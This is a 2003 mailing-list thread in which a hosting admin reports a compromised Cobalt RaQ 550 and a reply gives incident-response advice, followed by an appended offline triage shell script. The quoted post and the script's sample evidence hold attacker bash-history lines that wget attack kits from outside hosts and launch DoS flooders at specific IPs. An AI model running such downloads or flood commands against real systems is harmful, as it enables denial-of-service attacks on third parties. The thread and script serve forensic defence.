
Re: [cobalt-security] raq 550 hacked



vadimII/vadimI are network flooders. Most of these programs can be exploits
or rootkits; a good thing to do is run "chkrootkit" to try to see if you
have any rootkit installed, hidden processes, etc. If it is an option, try
to isolate that hacked HD, mount it on a clean box and scan it. Take a good
look at your log files to try to track this "hacker" (including httpd,
especially the sites that run under these users; the "hacker" could have
got in in the first place through a flaw in a CGI script, etc.). Another
good thing is to firewall the SSH port and allow only trusted IPs to
connect. Also, if no rootkit/trojan or modified system files were detected
and you have all the security patches applied, it sounds like passwords
have been cracked; in this case a massive password change would be needed.
Hope this helps.

[]'s
Nino


----- Original Message -----
From: "Tik & Klik Internetdiensten" <info@xxxxxxxxxx>
To: <cobalt-security@xxxxxxxxxxxxxxx>
Sent: Monday, October 06, 2003 4:14 PM
Subject: [cobalt-security] raq 550 hacked


> Hello,
>
> this weekend it looks like a RaQ 550 of mine was hacked.
> I tracked some processes that were flooding.
> The program was called vadimII.
>
> It was run under the name of a user that had SSH access.
> When I blocked this user it started a day later with another user.
>
> These 2 users are from different sites on the same machine,
> but these 2 users are from the same person.
> Tracking the IPs I came out in Washington,
> but the user is Dutch, so it looks like someone hacked his computer to
> retrieve his passwords?
>
> Is there a way to check if the RaQ is infected, or will blocking this
> user from SSH be enough?
> The program that was running was in the /home/tmp dir, in the flood
> folder; a list is below.
> The file broadcast.txt has 2102 IPs in it.
>
> I also have saved the bash history of the 2 users.
> There are several programs that were downloaded to my server.
> I shortened the bash history to the programs that were downloaded,
> below this mail.
>
> Please advise
>
> ----------
> -rwxr-xr-x 1 xxx users 22446 Feb 9 2001 alpha
> -rwxr-xr-x 1 xxx users 23521 Aug 17 2000 bloop
> -rw-r--r-- 1 xxx users 31909 Aug 22 2001 broadcast.txt
> -rwxr-xr-x 1 xxx users 26981 May 9 01:10 cw
> -rwxr-xr-x 1 xxx users 2250 Apr 11 2001 da.sh
> -rwxr-xr-x 1 xxx users 24747 Mar 10 1996 juno
> -rwxr-xr-x 1 xxx users 25285 Aug 17 2000 nestea
> -rwxr-xr-x 1 xxx users 24577 Oct 3 2000 overdrop
> -rwxr-xr-x 1 xxx users 22803 Oct 17 2000 rc8
> -rwxr-xr-x 1 xxx users 28910 Sep 7 2000 s
> -rwxr-xr-x 1 xxx users 24786 Mar 10 1996 sl
> -rwxr-xr-x 1 xxx users 17027 Feb 9 2001 sl2
> -rwxr-xr-x 1 xxx users 17027 Mar 2 2001 sl3
> -rwxr-xr-x 1 xxx users 17027 Aug 22 2001 slice2
> -rwxr-xr-x 1 xxx users 14883 May 13 2001 slice3
> -rwxr-xr-x 1 xxx users 33962 Oct 17 2000 smack
> -rwxr-xr-x 1 xxx users 31558 Feb 18 2001 smurf5
> -rwxr-xr-x 1 xxx users 39382 Sep 7 2001 smurf6
> -rw-r--r-- 1 xxx users 19008 Aug 22 2001 smurf6-linux+LPG.c
> -rwxr-xr-x 1 xxx users 22158 Aug 6 2000 stealth
> -rwxr-xr-x 1 xxx users 15087 May 13 2001 stream
> -rwxr-xr-x 1 xxx users 15151 May 13 2001 stream2
> -rwxr-xr-x 1 xxx users 23011 Jul 10 00:07 super
> -rwxr-xr-x 1 xxx users 23671 May 13 2001 synhose
> -rwxr-xr-x 1 xxx users 26449 Feb 7 1996 synk
> -rwxr-xr-x 1 xxx users 15687 May 13 2001 synk7
> -rwxr-xr-x 1 xxx users 16519 May 13 2001 synsend
> -rwxr-xr-x 1 xxx users 23587 May 13 2001 trash
> -rwxr-xr-x 1 xxx users 26252 May 13 2001 trash2
> -rwxr-xr-x 1 xxx users 22741 Nov 8 2000 udp
> -rwxr-xr-x 1 xxx users 22446 Aug 22 2001 vadimI
> -rwxr-xr-x 1 xxx users 2635 Aug 22 2001 vadimI.c
> -rwxr-xr-x 1 xxx users 23414 Jun 25 21:52 vadimII
> -rwxr-xr-x 1 xxx users 13607 May 13 2001 xdestroy
> -rwxr-xr-x 1 xxx users 15119 May 13 2001 xshock
>
> -----
> bash history
> wget www.ps-lov.us/pizda.tgz
> wget snow.prohosting.com/muiemuie/p.tar.gz
> wget snow.prohosting.com/muiemuie/p.tgz
> wget snow.prohosting.com/muiemuie/km3.tgz
> wget 65.113.119.133/muiemuie/km3.tgz
>
> It runs programs like
> ./super 69.65.48.23 53 nasa.gov
> ./vadimII 210.0.204.185 53 100000000000000000000000000000000000000 0
> ./cw 210.0.204.185
> ./stealth 210.0.204.185 6500000000000
> ./super 64.207.19.6 53 nasa.gov
>
>
> _______________________________________________
> cobalt-security mailing list
> cobalt-security@xxxxxxxxxxxxxxx
> http://list.cobalt.com/mailman/listinfo/cobalt-security
>
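Nino's advice (pull the disk, mount it read-only on a clean box, then read the users' bash histories and the tool directory from the copy rather than trusting the compromised system's own binaries) as a worked offline triage script. This is an added example, not code from the list post, from Nino, or from Cobalt. The evidence root, the sample .bash_history and the files the script creates under a temporary directory are constructed for the example; it reuses only the host names, IPs and file names that already appear in the post.

```shell
#!/bin/sh
# Offline triage of a compromised user's files from a disk mounted on a clean
# box. Added example, not from the list post. The evidence layout and the
# sample files built by make_sample_evidence are assumptions for this script;
# on a real case point the functions at the mount point (e.g. /mnt/evidence).
LC_ALL=C
export LC_ALL

# Constructed evidence tree so the script runs stand-alone: the post's
# /home/tmp/flood layout plus one user's .bash_history.
make_sample_evidence() {
  root=$(mktemp -d) || return 1
  mkdir -p "$root/home/tmp/flood" "$root/home/user1"
  printf '%s\n' 'ls' \
    'wget www.ps-lov.us/pizda.tgz' \
    'wget snow.prohosting.com/muiemuie/p.tar.gz' \
    'wget 65.113.119.133/muiemuie/km3.tgz' \
    'cd /home/tmp/flood' \
    './vadimII 210.0.204.185 53 100 0' \
    './super 69.65.48.23 53 nasa.gov' > "$root/home/user1/.bash_history"
  for f in vadimII super cw; do
    printf '\177ELF' > "$root/home/tmp/flood/$f"   # fake ELF magic only
    chmod 755 "$root/home/tmp/flood/$f"
  done
  printf '#!/bin/sh\n' > "$root/home/tmp/flood/da.sh"
  chmod 755 "$root/home/tmp/flood/da.sh"
  printf '1.2.3.4\n5.6.7.8\n' > "$root/home/tmp/flood/broadcast.txt"
  printf 'int main(){}\n' > "$root/home/user1/evil.c"
  chmod 4755 "$root/home/user1/evil.c"   # setuid bit on a user file
  echo "$root"
}

# Hosts the tools were fetched from, from every .bash_history on the tree:
# what to block at the firewall and report upstream.
history_download_hosts() {
  find "$1" -name .bash_history -type f -exec cat {} + \
    | grep -E '^[[:space:]]*(wget|curl|ftp|lynx|ncftpget)[[:space:]]' \
    | awk '{print $2}' \
    | sed -e 's#^[A-Za-z]*://##' -e 's#/.*##' \
    | sort -u
}

# Flood targets: history lines that launch a ./binary with an IP argument.
history_flood_targets() {
  find "$1" -name .bash_history -type f -exec cat {} + \
    | awk 'substr($1,1,2) == "./" && $2 ~ /^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$/ {print $2}' \
    | sort -u
}

# ELF executables under a suspect directory, identified by magic bytes rather
# than by name or by file(1) on the victim: hash these and keep them as evidence.
list_elf_executables() {
  find "$1" -type f -perm -100 | sort | while read -r f; do
    magic=$(dd if="$f" bs=4 count=1 2>/dev/null | od -An -tx1 | tr -d ' \n')
    if [ "$magic" = "7f454c46" ]; then
      echo "$f"
    fi
  done
}

# Setuid/setgid files anywhere on the evidence tree; run this over the whole
# mounted root, since a rootkit's leftovers rarely sit in the user's home.
find_setuid_files() {
  find "$1" -type f \( -perm -4000 -o -perm -2000 \) | sort
}

# Stand-alone run against the constructed tree.
if [ "${TRIAGE_DEMO:-1}" = 1 ]; then
  root=$(make_sample_evidence)
  echo "download hosts:"; history_download_hosts "$root"
  echo "flood targets:";  history_flood_targets "$root"
  echo "ELF binaries:";   list_elf_executables "$root/home/tmp/flood"
  echo "setuid files:";   find_setuid_files "$root"
  rm -rf "$root"
fi
```

On a real case, run with TRIAGE_DEMO=0, pass the read-only mount point to each function, and compare the hashes of the listed binaries and of the system's own ls, ps, netstat and sshd against a clean RaQ install before drawing conclusions from anything the victim itself reports.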